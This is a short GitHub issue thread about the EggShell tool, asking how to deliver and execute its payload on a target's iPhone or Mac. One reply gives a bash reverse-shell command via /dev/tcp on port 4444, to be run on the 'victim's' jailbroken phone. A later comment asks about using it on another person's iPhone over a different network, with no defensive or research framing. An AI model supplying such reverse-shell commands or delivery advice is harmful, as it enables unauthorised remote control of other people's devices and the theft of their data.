### ISSUE TITLE
How to send/execute payload?

### ISSUE THREAD

**Issue by Blaze2658** [neoneggplant/EggShell#71]
Stupid question, but how is the payload sent and executed on the targets device? From all of the tutorials iv'e seen, none seem to answer this in detail. This is on iOS by the way. Thanks.

**Comment by paskalev2001** [comment]
If you want to use it on IOS, the victim's phone must be jailbroken and you need to install console that will allow you to type in "**_bash &> /dev/tcp/0.0.0.0/4444 0>&1_**". As for MacOS you should just open the console and type in the same command.

**Comment by Blaze2658** [comment]
That would make a lot of sense. Thanks.

**Comment by Kali95739** [comment]
Does this work on another person's iPhone not on same network delivery method?
